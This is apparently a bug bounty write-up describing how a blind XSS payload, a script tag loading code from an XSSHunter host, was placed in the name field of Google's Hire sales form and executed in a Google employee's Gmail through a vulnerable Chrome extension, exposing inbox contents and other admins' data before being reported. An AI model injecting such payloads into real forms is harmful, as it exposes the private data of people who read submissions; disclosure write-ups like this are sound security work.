Blind XSS against a Googler


I found a blind xss against a Googler because they were using a vulnerable Gmail Chrome Extension.


When Google emailed all GSuite admins about its new feature, Hire with Google, I started to look into what the feature was and how it was designed. Initially, I could not look into this in depth because my G Suite account was not eligible for Hire. However, after few months a sales person from Google reached out to me asking if I wanted to demo or purchase the service.

I wanted to actually use/purchase the feature to see how it worked so, I went to and started to fill the form. After few hours of submitting the form, something caught my attention. The sales person had reached back to me with an attachment of a contract to sign. I assumed this meant that the original email I got was not an automated sales email. Knowing that a real human was reading my submission, I got excited thinking "How are they receiving/reading my responses?". There could have been multiple ways this could have been done:

  • Custom CMS where the data is stored.
  • Third Party service.
  • Data is directly sent to email.

To understand how this could work, I decided to try putting a blind xss payload on my name when submitting the form. My thought process was that if they had a custom CMS or used some third party service, this could probably work and I could have a blind xss. For my payload, I used a simple XSSHunter payload:

<script src={{xsshunterwebsite}}></script>

After few hours, when I went back to XSSHunter, it showed that a bXSS had been executed. To my surprise this executed on a origin:

This XSS then gave me a lot of sensitive details:

  1. Email communications between the victim and their colleagues: the DOM html contained every email they had in their inbox when the xss executed.
  2. User information of other G Suite admins who had filled their data for either demoing the Hire service or buying it.
  3. And many more sensitive information.

After reporting

After reporting the issue, I discussed with Google's security team on how this could have executed. Turns out this was due to a XSS in Chrome extension for Gmail that they were using. In the end this was a cool bug and they rewarded pretty good for it.